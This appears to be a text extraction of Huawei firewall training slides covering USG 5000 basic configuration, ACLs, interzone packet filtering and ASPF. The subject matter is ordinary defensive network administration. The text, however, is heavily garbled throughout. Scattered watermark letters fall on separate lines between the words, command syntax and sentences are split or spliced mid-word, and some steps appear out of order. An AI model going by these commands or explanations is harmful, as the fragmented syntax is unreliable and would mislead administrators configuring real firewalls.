espaces. If the parameter is in
Type a command, followed by "?" separated by
l
/
/
this location, the description related to parameters
is displayed.
:
p
t
t
[USG 5000] interface ethernet ?
h
:
s
<3-3> Slot number
e
c
r by "?", all commands begin with this
u
Type a character string, followed
o
s
character string are displayed.
Re
g
<USG 5000> d? n
i
n
r delete dir display
debugging
a
Le
r
Pa ge 49
Copyrig
o
n
e
/
m
o
c
VRP Online Help
w
a
u
Type the first few characters of a key word of the command and then press
Tab. The complete key word can be displayed.
.
i
e
h
.
g
n
i
When the pause menu is displayed, press Ctrl+C to nstop display and
r
a
e
command execution.
l
/
/
When the pause menu is displayed, press:Space to continue to display the
p
t
information of the next screen.
ht
: press Enter to continue to display the
When the pause menu is displayed,
s
e
c
information of the next line.r
u
o
s
e
R
g
n
i
n
r
a
Le
r
Pa ge 50
Copyrig
o
n
e
/
Basic Configuration Thinking of om

c
.
i
Firewall
e
w
Based on network
requirements
.
g
n
i
n
Interface IP
address
Layer-3
interface
a
u
h
r
a
le
Interface
mode
/
/
p:
Layer-2
interface
Packets
forwarding
t
t
h
Interzone NAT
:
configuration
s
e
c
r
Routing
u
configuration so NAT is not required
Re
g
n
i
n
r
a
e
e
r
o
Adding
interface into
the security
zone
NAT
Interzone packet
filtering
relationship
configuration
Pa ge 51
Interface Mode Configuration
n
e
/
.
i
e
m
o
c
w
a
Step 1 Run the system-view command to enter the
system view.
u
h
.
g
Step 2 Run the interface interface-type interface-number
n
i
n
r
command.
a
e
l
/{ mask | mask-length }
Step 3.1 Run the ip address ip-address
/
:
p
command to configure L3 Ethernet
t interface.
t
h
Step 3.2 Run the portswitch:command to configure L2 Ethernet
s
e
c
interface.
r
u
o
s
e
R
g
n
i
n
r
a
Le
r
Pa ge 52
Copyrig
o
Security Zone Configuration
n
e
/
.
i
e
m
o
c
w
a
Step 1 Run the system-view command to enter the system
u view.
h
.
g
Step 2 Run the firewall zone [ vpn-instance vpn-instance-name
]
n
i
n zone and enter
[ name ] zone-name command to create the security
r
a
e
the corresponding security zone view.
l
/
/
:
p
t
The security Configuring the keyword.tNo name is required. Enter the
h
zone exists.
security zone view directly.
:
s
e
The security
Configuring theckeyword. No name is required. Enter the
r
zone does
u
security zone
o view.
not exist.
s
e
R
Step 3 Run the set priority security-priority command to configure the
g
n
i of the security zone.
security level
n
r
a
Le
r
Pa ge 53
Copyrig
o
n
e
/
Adding Interface into the Securityom

c
.
i
Zone
e
w
Step 1
Run the system-view command to enter theuasystem view.
h
.
g
Step 2 Run the firewall zone [ vpn-instance vpn-instance-name

]
n
i
[ name ] zone-name command to create thernsecurity zone and
a
e
enter the corresponding security zone/view.
l
/
:
Step 3
Run the add interface interface-type
interface-number
p
t
command to configure the interface
ht to be added into the security
:
s
zone.
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 54
Copyrig
o
n
e
/
Configuration of Default Interzone

m
o
c
.
Packet-Filtering Rules
i
e
w
a
u view.
h
.
g
n | deny } { { all |
Step 2 Run the firewall packet-filter default { permit
i
n| outbound } ] }
r
interzone zone1 zone2 } [ direction { inbound
a
e
l packet filtering rules.
command to configure the interzone default
/
/
:
p
t
ht
Do zones1:or zone 2 follow the sequence?
e
c
r
u
o
s
Re No, because the inbound and outbound
g
n
i
direction are only related to the domain priority.
n
r
a
Le
e
r
o
Pa ge 55
Route Configuration
n
e
/
.
i
e
m
o
c
w
a
The operation should be performed when configuringu static routing.
h
.
g view.
n
i
n
Step 2 Run the ip route-static ip-address { maskar
| mask-length } { interfacee
l
type interface-number | next-ip-address }/[ preference value ] [ reject |
/
:
blackhole ] command to add a staticprouting.
t
t
h when configuring default
The operation should be performed
:
s
routing.
e
c
r command to enter the system view.
u
Step 1 Run the system-view
o
s
Re
Step 2 Run the ip route-static
ip-address { mask | mask-length } { interfaceg
n
type interface-number
| next-ip-address } [ preference value ] [ reject |
i
n] command to configure the default routing.
r
blackhole
a
e
L
r
Pa ge 56
Copyrig
o
AAA Configuration
n
e
/
.
i
e
m
o
c
w
a
The configuration method for adding the user into uthe firewall
h
.
in the AAA view is shown as follows:
g
n
i
n
Step 1 Run the aaa command to enter the AAA
r view.
a
e
l
Step 2 Run the local-user user-name password
{ simple | cipher }
/
/
:user and set the password.
password command to create the
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 58
Copyrig
o
n
e
/
m
o
c
FTP Configuration
.
i
e
w
a
u
If the firewall is configured as the FTP server, the configuration method is shown as
h
.
g
follows:
n
i
n
Step 1 Run the system-view command to enter the system view and complete the basic
r
a
le
firewall configuration.
/
/
p:
Step 2 Run the ftp server enable command to enable the FTP server.
t
t
h
Step 3 Refer to section "AAA configuration" and create the FTP user.
:
s
e
c
the user access directory.r Only when the username, password, and access
u
o
directory are configured,
s the FTP client can be logged in and files on the firewall
e
R
can be accessed. The system be accessed by multiple users at the same time.
g
n
i
Step 5 Run the local-user
lever number { 1 | 2 | 3 } command to configure the user's
n
r
alevel.
access
e
L
r
Pa ge 59
Copyrig
o
Step 4 Run the local-user user-name ftp-directory ftp-directory command to configure
Telnet Configuration
n
e
/
.
i
e
m
o
c
w
a
Step 1 Run the system-view command to enter the system view.
u
h
.
g
Step 2 Run the user-interface [ user-interface-type ] user-interface-number
n
i
n the user interface
[ ending-userinterface-number ] command to renter
a
e
view.
l
/
/ ] command to allow to end the
:
Step 3 Run the idle-timeout minutes [ seconds
p
t
Telnet connection at regular time.
ht To prevent an illegitimate invasion of
: user's input is not received after a
authorized users, if the terminal
s
e with users should be disconnected. The
c
period of time, the connection
r
u
o the terminal user by default is set as 10 minutes.
disconnection timesof
e
R
Note: Refer to section
"AAA Configuration" to add the Telnet user.
g
n
i
n
r
a
e
L
r
Pa ge 61
Copyrig
o
n
e
/
m
o
c
Telnet Configuration
.
i
e
Telnet authentication modes
w
a
u
h
.
g
n
i
n
No
authentication
Password
Password
authentication
/
/
p:
r AAA
a
leauthentication
authentication
t
t
Step 4 Run the authentication-mode { aaa | none | h
password | local user username password
password } command to set the authentication
mode when logging in to the user interface. By
:
s
default, the password authenticationeis set as the authentication method.
c { simple | cipher } password command to set the
r
Step 5 Run the set authentication password
u When the password authentication is set as the
o
password for the local authentication.
escommand needs to be configured (optional).
authentication method, R
this
Step 6 Run the user privilege
g level level command to configure the command level that can be
n
accessed by the user
i from the current user interface login system. The default level is 0
n
r the authentication-mode is set as the aaa mode, this step does not need to
(optional). (When
a
be configured.)
Le
r
Pa ge 62
Copyrig
o
Web Management Configuration
n
e
/
m
o
c
.
i
e

awview.
u
h
.
Step 2 Run the web-manager [ security ] enable [ port

g port-number ]
n
command to enable the Web management
nifunction.
r
a
eto add the Web
Step 3 Refer to section "AAA Configuration"
l
/
/
management user.
:
p
t
t
Step 4 Run the local-user user-name
h service-type web command to
: type as Web.
configure the user's service
s
e
c
r
Step 5 Run the local-user user-name
level 3 command to configure the
u
o
user's level. TheesWeb user's level must be set to level 3 (highest
R
level).
g
n
i
n
r
a
Le
r
Pa ge 63
Copyrig
o
n
e
/
m
o
c
Other Basic Configurations
.
i
e
w
a
u
Users can modify the current firewall configuration by using the command
line interface. To set this current configuration as the initial configuration of
the firewall for the next time when powering on, run the save command to
save this current configuration into the default storage device and form the
configuration file.
h
.
g
n
i
n
r
a
le
/
/
p:
In the user's view, run the reset saved-configuration command to erase the
configuration file. After the configuration file is erased, the firewall will
adopt the default configuration parameters to initiate for the next time
when powering on.
t
t
h
:
s
e
c
In the user's view, run the r
reboot command. The firewall is restarted and
u
o
this restart action is logged.
s
e
R
Run the startup system-software sysfile command to configure the system
g for the next startup.
n
software file name
i
n
r
a
Le
r
Pa ge 64
Copyrig
o
n
e
/
m
o
c
Summary
Definition and classification of firewalls
.
i
e
w
a
u
h
.
g
n
i
Main features and technologies of firewalls
n
r
a
efirewall configurations
Data forwarding process and basic
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 65
Copyrig
o
n
e
/
m
o
c
Questions
w
a
u
What is the difference between the stateful inspection firewall and the
packet-filtering firewall?
.
i
e
h
.
g
n
i
Why the V100R005 has no firewall working modenconfiguration? What
r
a
e
mode does it use to differentiate?
l
/
/
What is the relationship between the security
: zone and the interface?
p
t
t
What is the difference between Inbound
h and Outbound in the interzone
:
packet filtering policies?
s
e
c
r IP link is integrated with the static routing and
After the reliable technology
u
o
s
dual-system hot backup
technology, what are the advantages?
e
R
g
n
i
n
r
a
Le
r
Pa ge 66
Copyrig
o
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 67
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
Chapter 3
Filtering
n
r
a
g
n
i
w
a
u
h
.
g
Firewall Packet
n
i
n
r
a
Technologyle
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
m
o
c
w
a
u to:
able
.
g
n
ACL principles
i
n
r
ACL functions and classification lea
/
/
:
Application scenarios and configurations
of interface-based
p
t
t
packet filtering
h
:
s
Application scenariose and configurations of interzone
c
r
packet filtering ou
s
e
R
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. ACL Overview
2. Interface-based Packet Filtering
h
.
g
3. Interzone Packet Filtering
n
i
n
r
a
le
/
/
p:
4. Application Analysis of Packet

tt Filtering
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 2
n
e
/
m
o
c
Overview of IP Packet Filtering Technology
.
i
e
w
For the packets to be forwarded, the firewall reads/examines the packet
a header and
u
h whether to
compare the header information against the defined rules to determine
.
gor discard the packet
n
permit the packets or not. The firewall determines to forward
i
n
based on the comparison. The key packet filtering technology
r is ACL.
a
e
l
/
/
:
p
t
Intranet
t
h
:
s
e
c
r
Internet
u
o
s
Regional office
Re
g
n
i
n
r
a
H.Q.Le
Unauthorized user
r
Pa ge 3
Copyrig
o
ACL Definition
n
e
/
.
i
e
m
o
c
w
a
u figure.
TCP/IP packet format is as shown in the following
h
.
g
In this figure, the upper-layer protocol isinTCP/UDP.
n
r
a
e
l
MAC packet
TCP/UDP /
IP packet
Data
/
header
packet header
header
:
p
t
ht
:
s
Protocol No.
Protocol No. ce
r Source port
u
For TCP/UDP packets, these five
Source address
Source address
o
s
elements constitute a quintuple,
Destination
e
while the ACL is defined
R
Destination
Destination
port
according these information.
gaddress
address
n
i
n
r
a
Le
r
Pa ge 4
Copyrig
o
n
e
/
m
o
c
ACL Principles
.
i
e
w
a
u
ACL
Allows A to carry out
subsequent operations
Denies subsequent
operations of B
Step 1:
The inbound data flow
arrives on the firewall.
Inbound
data flow
ACL functions:
n
r
a
g
n
i
h
.
Step 2: g
n
i
Search
n for the ACL.
r
aDetermine whether to
e
l
/ allow the next operation.

/
:
Default policy operation
Step 3:
p
t
The firewall processes
ht
packets according to the
: AAAA
AA
s
ACL.
BBAABBBAAAA
e
c
r
u
o
Outbound
s
e
data flow
R
Filter flows that pass through the firewall based on the defined rules. The
keyword determines the next step for the filtered out flows.
e
r
o
Le
Pa ge 5
n
e
/
m
o
Packet Filtering Classificationi.c
e
w
a
u
Interface packet filtering
h
.
g
Outbound
n
i
n
r
Inbound
a
e
l
G0/0/0
G0/0/1 //
:
p
t
t
h
Interzone packet filtering :
s
Outbound
e
c
r
u
o
s
Trust zone
Untrust zone
e
R
g
n
i
n
r
a
Inbound
Le
r
Pa ge 6
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. ACL Overview
h
.
g
n
i
n
r
a
le
/
/
p:

tt Filtering
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 7
n
e
/
m
Overview of Interface-based Packet
o
c
.
Filtering
i
e
w
a
u
h
Application
.
Filtered Object
PacketngFiltering Mode
Interface
i
n
r
a
e
IP packet
Interface-based
packet filtering
l
/
/
:MAC address-based packet
Common interface
p
Ethernet framett
h filtering
:
s
e and
Interface on special IP packet
c
r
Hardware packet filtering
u
o frame
interface card
Ethernet
s
Re
Scenario: Interfaces
g
n
has not been added
i
n
to a security zone.
r
a
Le
e
r
o
Pa ge 8
n
e
/
m
o
c
ACL Classification
.
i
e
w
a
u
Identify ACLs by using numbers.
Identify ACL types by using number ranges.

in
n
r
a
e
l
/
/
p: Number Range
ACL Type
Basic ACL
Advanced ACL
s:
t
t
h
e
c
r
u
o
s
MAC-based ACL
Re
e
r
o
h
.
g
g
n
Hardware
i packet filtering ACL
n
r
a
Le
2000-2999
3000-3999
4000-4999
9000-9499
Pa ge 9
Basic ACL
n
e
/
.
i
e
m
o
c
w
a
u
The basic ACL uses only source addresses tohdescribe
.
g
noperation.
data, indicating whether to perform next
i
n
r
a
e
l address
Packets from/IP
/
202.110.10.0/24
can
:
p the firewall!
pass through
t
ht
:
s
e
c
Packets from IP addressr
Firewall
u
192.110.10.0/24 cannot
o
s
pass through the firewall!
Re
g
n
i
n
r
a
Le
r
Pa ge 10
Copyrig
o
n
e
/
m
o
c
Basic ACL Configuration
.
i
e
w
a
u
Access the system view:
h
.
g
acl [ number ] acl-number [ vpn-instance vpn-instance-name ]
Create a basic ACL and enter the ACL view:
n
i
n
r
a
rule [ rule-id ] { permit | deny } [ source { source-address
source-wildcard |
e
l
/
any |address-set address-set-name } | time-range
time-name | logging ]
/
:
p
Apply the basic ACL and enter the tinterface
view:
t
h
firewall packet-filter acl-number {inbound | outbound}
:
s
e
c
r
How do you use an IP
u
o
s
address and a
e
R
wildcard mask to indicate
g
a network segment?
n
i
n
r
a
e
L
r
Pa ge 11
Copyrig
o
How to Use the Wildcard Mask
.
i
e
m
o
c
w
a
The wildcard mask format is similar to the subnet mask
format, but
u
h
.
they have different meanings.
g
n
i
n
0: indicates that the corresponding bit in the IP
address
should be
r
a
e
compared.
l
/
/in the IP address will not be
:
1: indicates that the corresponding bit
p
t
compared.
ht
s:
The wildcard mask is used etogether
with the IP address, which can
c
r
describe an address range.
u
What is the
o
function of
s
e
wildcard mask
0
0
0
255
R Compares the first 24 bits only
0.255.0.255?
g
Compares the first 22 bits only
0
0
3 in 255
n
r
Compares the first 8 bits only
0 255 a255
255
e
L
r
Pa ge 12
Copyrig
o
n
e
/
n
e
/
m
o
c
Time Range-Based ACL
172.16. 0.0/16
.
i
e
time-range work-policy1 08:00 to 18:00 working-day
w
a to 18:00 2009/12/31
time-range work-policy2 from 08:00 2009/01/01
u
h
.
g
n
rule permit ip source 192.168.11.0 0.0.0.255
time-range work-policy1
i
n
rule permit ip source 192.168.12.0r0.0.0.255 time-range work-policy2
a
e
l
/
/
:
p
t
ht Firewall Untrust
:
s
e
c
r
u
o 2009/07/15 14:15
s
e
DMZ
Server group
rn
e
r
o
a
e
L
g
n
i
Trust
192.168.12.0/24
192.168.11.0/24
Pa ge 13
n
e
/
m
o
Meanings of Time Range Operators .c
i
e
w
a
u
h
.
Meanings
Operator and Syntax
g
n
i
n
Fromr xx time To xx time
HH:MM
a
e
l
/
/ From xx date To xx date
YYYY/MM/DD
:
p
t
tMonday/Tuesday/Wednesday/Thursda
h
Mon/Tue/Wed/Thu/Fri/Sat/Sun :
y/Friday/Saturday/Sunday
s
e
c
r
u
Daily
Every day in a week
o
s
e
R
Off days
Off days (Saturday/Sunday)
g
n
i days
Working
Working days (Monday to Friday)
n
r
a
e
L
r
Pa ge 14
Copyrig
o
Advanced ACL
n
e
/
.
i
e
m
o
c
w
a
u the
The advanced ACL uses more information besides
h
.
g
n whether to
source address to define a packet, indicating
i
n
r
a
carry out the next step.
e
l
/
/
Which information is
:
p
detected by the firewall
The packets from IP address
t
based on status detection?
202.110.10.0/24 to IP address ht
179.100.17.10 that use TCP
s:
and access resources by e
using
c the
HTTP can pass through
r
firewall!ou
s
e
R
g
Firewall
n
i
n
r
a
e
L
r
Pa ge 15
Copyrig
o
n
e
/
m
o
c
Advanced ACL Configuration Commands
.
i
e
w
In system view:
a
u
h
acl [ number ] acl-number [ vpn-instance vpn-instance-name.]
g
n
i
n
Create an advanced ACL and enter the ACL view:
r
a
e { destination-address
rule [ rule-id ] { deny | permit } protocol [ destination
l
/
/
destination-wildcard | any | address-set address-set-name
} | destination-port {
:
p
t } | precedence precedence | source
operator port1 [ port2 ] | port-set port-set-name
t
h
{ source-address source-wildcard |:any | address-set address-set-name } | sources
e
port { operator port1 [ port2 ] |cport-set port-set-name } | time-range time-name | tos
r
u
o icmp-code | logging ]
tos | icmp-type icmp-type
s
e
R
Apply the advanced ACL and enter the interface view:
g
n
i
firewall packet-filter
acl-number {inbound | outbound}
n
r
a
e
L
r
Pa ge 16
Copyrig
o
n
e
/
m
Meanings of Port Number Operators in the
o
c
.
Advanced ACL
i
e
w
a
u
h
.
Meanings
Operator and Syntax
g
n
i
n
r to port number
Equal
equal portnumber
a
e
l
/Greater than port number
/
greater-than portnumber
:
p
t
t
h
less-than portnumber
Smaller than port number
:
s
e
not-equal portnumberrc
Not equal to port number
u
o
range es
Between port number1 and port
R
portnumber1 gportnumber2
number2
n
i
n
r
a
Le
r
Pa ge 18
Copyrig
o
n
e
/
Functions of Address Set and Service

m
o
c
.
i
Set
e
w
.
a
u
h
ServicengSet
Address Set
i
n
r
ip address-set guest type object

address 0 192.168.12.0 0.0.0.15
address 1 192.168.15.0 0.0.0.63
address 2 192.168.30.0 0.0.0.127
Re
/
/
:
servicep protocol tcp destination-port 8080
t
t
service
h protocol tcp destination-port 8443
service protocol tcp destination-port 80
: service protocol udp destination-port 53

s
e
c
r
u
o
s
ip address-set ERP type object
a
e
l
ip service-set Internet type object
address 0 10.10.0.0 0.0.0.127
ip service-set ERP type object

g
n
i 0.0.0.255
address 2 10.100.10.0
n
r
a
e
L
r
Pa ge 19
Copyrig
o
address 1 10.16.15.0 0.0.0.255
Advanced ACL Examples
n
e
/
.
i
e
m
o
c
w
a
rule deny ip source address-set guest destination address-set
erp
u
h
.
rule permit tcp source address-set guest destination
g any destinationn
i
port service-set Internet
n
r
a
e
IP packets
l
/
10.1.0.0/16
/
:
p
t
t
h
:
s
e 0.0.255.255 destination 202.38.160.0
rule deny tcp source 129.9.0.0
c
r
u
0.0.0.255 destination-port
o equal www
s
TCP packets
Re
WWW port
g
n
129.9.0.0/16i
202.38.160.0/24
n
r
a
Le
r
Pa ge 20
Copyrig
o
MAC Address-Based ACL
n
e
/
.
i
e
m
o
c
w
a
MAC address-based ACL defines data flows according to
u the source
h
. in the
g
MAC address, destination MAC address, and type fields
n
i
n
Ethernet frame head to control Layer-2 data frames.
r
a
e
l
/
Packets to DMAC
/ B-B-B
:
p
can pass through
the
t
firewall!
ht
:
s
e
c
Packets from SMAC A-A- ur
o
A cannot pass through
s
the firewall! Re
Firewall
g
n
i
n
r
a
Le
r
Pa ge 21
Copyrig
o
n
e
/
m
o
c
MAC Address-Based ACL Configuration .

i
e
w
a
u
h
. ]
acl [ number ] acl-number [ vpn-instance vpn-instance-name
g
n
i
n the ACL view:
r
Create an MAC address-based ACL and enter
a
e
l| type-name} | cos lcos-code |cosrule [ rule-id ] { permit | deny } { type {type-code
/
/
:
name}} [ source-mac source-address source-mac-wildcard
] [ dest-mac destinationp
t
address destination-mac-wildcard ] ht
:
s
Apply the MAC address-based
ACL and enter the interface
e
c
r
u
view:
o
s
Re
firewall ethernet-frame-filter
acl-number inbound
g
n
i
n
r
a
Le
e
r
o
Pa ge 22
m
o
c
Hardware Packet Filtering ACL i.
e
w
a
n
e
/
It filters hardware packets. Traffic can be matched based

u on the
h
.
g IP address,
source MAC address, destination MAC address, source
n
i
n
destination IP address and protocol.
r
a
e
l
/ that supports
Interface
/
:hardware packet
p
t
t
filtering
h
: IP Prot Source Destinatio
s
Source IP Destination
Source MAC Destination
e
MAC address address
address
n port
address
ocol
port
c
r
u
o
s
Re
Firewall
g
n
i
n
r
a
Le
r
Pa ge 23
Copyrig
o
n
e
/
m
o
c
Hardware ACLs Configuration
w
a
u
h
.
g
acl [ number ] acl-number [ vpn-instance vpn-instance-name ]
in
Create a hardware ACL and enter the ACLnview:
r
a
rule [ rule-id ] { permit | deny } { source-mac source-mac-address
source-mace
l
/ destination-mac-wildcard
wildcard | destination-mac destination-mac-address
/
:
p
|source-ip source-ip-address source-wildcard
t | destination-ip destination-ip-address
t
h
destination-wildcard | protocol { icmp [ icmp-type { icmp-type icmp-code | icmp:
s
message } ] | { tcp | udp } [ source-port
e { port | protocol-name } ] [ destination-port
c
r
{ port | protocol-name ] | ipu| igmp | gre | ospf | ipinip } | ethernet-type { type-code |
o
s
e
type-name } | cos {Rcos-code
| cos-name } }
g
Apply the hardware
ACL and enter the interface view:
n
i
n acl-number inbound
r
hardware-filter
a
e
L
r
Pa ge 24
Copyrig
o
.
i
e
n
e
/
m
o
c
Matching Mode and Step Configuration
.
i
e
w
a
u
h
.
g
n
i
n
] [matchr
a
e
order{auto|config}]
l
/
/
:
p
Set the ACL step:
t
t
h
Step step
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 25
Copyrig
o
n
e
/
m
o
c
Acceleration and Counter Functions
.
i
e
w
a
ACL acceleration function
u
h
.
g
It enhances the ACL search performance significantly.
n
i
n
r
ACL counter
a
e
l
acl 2001
/
ACL counter
/ 10.32.255.0 0.0.0.255
:
rule 0 permit source
p
t
rule 10 permit
ht source 192.168.10.0 0.0.0.255
:
s
e
c
r
u
o
display acl 2001
s
17:18:07 2009/07/21 e
R
Basic ACL 2001, 2 rules, not binding with vpn-instance
Acl's step is 5 ng
i 10.32.255.0 0.0.0.255 (27 times matched)
rule 0 permitnsource
r source 192.168.10.0 0.0.0.255 (1 times matched)
rule 10 permit
a
Le
r
Pa ge 26
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. ACL Overview
h
.
g
n
i
n
r
a
le
/
/
p:

tt Filtering
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 27
n
e
/
Overview of Interzone Packet Filtering om

c
.
Technology
i
e
w
a
u
h
Trust zone
Untrust zone.
g
n
i
Server
n
Firewall
r
Client
a
e
l
/
/
Hit the
:
p
first packet.
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i If it is not the first packet, search the session table.
n
r
a
Le
e
r
o
Search the routing table. Based on the zone and direction of the
interface, search for the interzone packet filtering rule.
Policy0: allows packets with the source address
of 192.168.168.0 through
Policy1: denies packets with the source IP address

of 192.168.100.0
The default interzone packet

filtering rule is prohibited.
Pa ge 28
n
e
/
Interzone Packet Filtering

Application
m
o
c
.
i
e
w
a
u
h
.
Deny packets
from
g
n
an Untrust
zone to a
i
n
r zone.
Trust
a
le
Permit packets from a

Trust zone to an
Untrust zone.
/
/
p:
Trust zone
r
u
o
t
t
h
Firewal
:
s
ce l
Untrust zone
s
e
R
policy interzone trust untrust outbound

policy 0
action permit
policy source 192.168.168.0 0.255.0.255
policy service service-set { service-set-name }
n
r
a
e
r
o
g
n
i
Le
Pa ge 29
n
e
/
m
o
c
Policy Priority
.
i
e
w
a
u
Address-set address set

policy 0
action permit
policy source address-set guest
policy destination address-set Internet
policy service service-set Internet
policy 1
action deny
:
s
e policy 0
c
r
u
o
s
Re
h
.
g set
Service-setnport
i
n
r
a
policy 1
e
l
action deny /
/ address-set guest
policy source
:
pdestination address-set intranet
t
policy
ht service service-set intranet
policy
action permit
policy destination address-set Internet

g
policy service service-setnintranet
policy service service-set Internet
i
n
r
a
e
L
r
Pa ge 30
Copyrig
o
policy destination address-set intranet
n
e
/
m
o
Multi-Channel Protocol Technology.c
i
e
w
a
Single channel protocol: It uses only one port during communication.
For
u
h
.
example, WWW occupies port 80 only.
g
n
icommunication. In
n
Multi-channel protocol: It uses two or more ports during
r
a
passive FTP mode, the protocol uses port 21 and e
a random port.
l
/
/
:
p
t
t
How to useha pure packet filtering method
: ports used by the multi-channel
to define
s
e at port level?
c
protocol
r
u
o
s
Re
g
A pure packet filtering method cannot define
n
i
data flows for the protocols that use a
n
r
randomly negotiated port.
a
Le
r
Pa ge 31
Copyrig
o
ASPF Overview
n
e
/
.
i
e
m
o
c
w
a
Application specific packet filter (ASPF) is an advanced filteringu technology,
h
which checks protocol information at the application layerg.
and monitors status
n
i
of the application layer protocol of connections. For all
connections,
n
r
information on connection status is maintained byaASPF and used to
e
l
dynamically determine whether packets can pass
/ through the firewall or
/
:
should be discarded.
p
t
t
h
:
s
e
c
r
u
o
s
Re
Dynamically create and
Monitor
g packets during
n
delete a filtering rule
communication
i
n
r
a Diversified ASPF functions guarantee service security.
e
L
r
Pa ge 32
Copyrig
o
n
e
/
m
o
ASPF Supporting Multi-Channel Protocols
c
.
i
e
w
ASPF applies to packet filtering at the application layer.
a
u
h
. Server 20.0.0.1
g
FTP
n
Control channel
i
Host 10.0.0.1
n
r
a
e
l
/
/
I use port 4952 to
:
Data channel
p
establish a data
t
channel with you.
ht
:
s
Session table
FTP:10.0.0.1:4927
--> 20.0.0.1:21
e
c
r
FTP:10.0.0.1:4926
--> 20.0.0.1:4952
u
o
s
ServerMap table
e
R
-------------------------------------------------------------------------------------------------------------------Inside-Address :Port Global-Address
:Port Pro AppType
TTL
Left
g
n
-------------------------------------------------------------------------------------------------------------------i
n
20.0.0.1 : 4952
--tcp FTP DATA 00:01:00 00:00:47
r
a
e
L
r
Pa ge 34
Copyrig
o
n
e
/
Port Identification Supporting Multi- om

c
.
Channel Protocol
i
e
w
a
Port identification is used to map a non-standard protocol
u port into
h
.
g
an identifiable application protocol port.
n
i
n
r
FTP Server
Control channel
a
e
Host 10.0.0.1
20.0.0.1:31
l
/
/
:
p
t
Data channel
ht
:
s
Configure the basic ACL.
e
c
r
u
ACL 2000-2099 Ruleopermit source a non-standard protocol port Server
s
e
IPaddress Wildcard
R
g
n
Configureiport identification (or port mapping).
n
r
a
Port-mapping
protocol-name port port-number acl acl-number
e
L
e
r
o
Which application protocol

is used by port 31?
What should I do if
I dont know it?
Pa ge 35
n
e
/
Fragment Cache and Long Connection om

c
.
i
Functions
e
w
a
Configure the aging time of fragment cache.
u
Fragment
Firewall session aging-time fragment interval (1-40000)h
.
cache function Disable direct forwarding of fragments.
g
n
Firewall fragment-forward disable
i
n
Enable direct forwarding of fragments.
r
a
Firewall fragment-forward enable
e
l
/
/
:
p
Long link
t
ht
:
s
e time.
c
Configure long link aging
r
u
o
Firewall long-link aging-time
time
s
e
R
Enable long link.
g
n
i
Firewall interzone
zone-name1 zone-name2 lonk-link acl-number
n
r | outbound }
{ inbound
a
Le
e
r
o
Pa ge 36
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. ACL Overview
h
.
g
n
i
n
r
a
le
/
/
p:

tt Filtering
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 38
n
e
/
m
o
c
Procedure of Firewall Packet Filtering
.
i
e
w
Inbound
Not hit
Hit
the
a Update
Search
Search the
packet
u
session
the
session
h
entry
.
blacklist
table
g
n
i
n
r
Hit
a
e
Search for
l
Outbound
Allow
/
the
default
Discard the
packet
/
Search the
interzone
packet
:
Not hit
routing
p
rules
t
table
t
Denied
or
not
matched
with
the
rule
h
:
Discard
s
Not matched
packets
e
Search the
c
r
Deny a rule
routing table to
Allow
u
match the
o
s
interzone
e
packet-filtering
R Search for
rule
the
g
n
interzone
i
ACL
n
r
a
e
L
r
Pa ge 39
Copyrig
o
n
e
/
m
o
Analysis of ACL Application Scenarios
c
.
i
e
Internet zone
w
a
Application scenarios
u
h
. zone
ACL in the g
Trust
n of the address and port sets
i
Application
n
r
Long
a link between the Trust zone and
e
192.168.150.1/24
lDMZ
192.168.100.1/24 /
/ Time-based control between the Trust
:
p
and Internet zones
t
t
h
ASPF application between the Internet
:
zone and DMZ
s
e
Port identification between the Internet
c
r
u
DMZ
zone and DMZ
192.168.168.1/24
o
s
Fragment cache between the Internet
e
R
zone and DMZ
g
n
Function: NAT/QoS/IPSec/routing policy
i
n
r
a Trust zone
e
L
r
Pa ge 40
Copyrig
o
n
e
/
m
o
c
ACL Function 1
.
i
e
w
a
u
h
.
g
Packet filtering
n
i
n
r
a
le

202.110.10.0/24 to IP address
172.16.17.10 that use TCP and
access resources by using HTTP can
pass through the firewall!
/
/
p:
:
s
e
c
r
t
t
h

192.110.10.0/24 to IP address
172.16.160.23 that use TCP and
access resources by using Telnet
cannot pass through the firewall!
Firewall
ou
n
r
a
e
r
o
g
n
i
s
e
R
Le
Pa ge 41
n
e
/
m
o
c
ACL Function 2
Address translation
.
i
e
w
a
u
ACL
Address translation applies to
user group A only.
h
.
g
n
i
n
r
a
le
User group A
/
/
p:
192.168.10.0/24
t
t
h
10.32.255.50/24
:
s
e
c
r
User group B
172.16.160.0/24
QoS
Policy routing g
IPSec
e
r
o
n
i
n
Re
u
o
s
Internet
58.241.12.253/30
Question: Why is the ACL

valid to these applications?
r
a
e
Pa ge 42
ACL Commands
.
i
e
m
o
c
w
a
]
u
h
.
g
acl-number: It defines a numerical ACL.
n
i
n
The ACLs ranging from 2000 to 2999 are basicrACLs.
a
e
The ACLs ranging from 3000 to 3999 are advanced
ACLs.
l
/
/
vpn-instance vpn-instance-name: It defines
: the VPN instance ACL.
p
t the VPN instance name, which is a
Herein, vpn-instance-name indicates
t
h
string containing one to 19 characters.
:
s
e
c
r
undo acl { [ number ] uacl-number
| all }
o
s
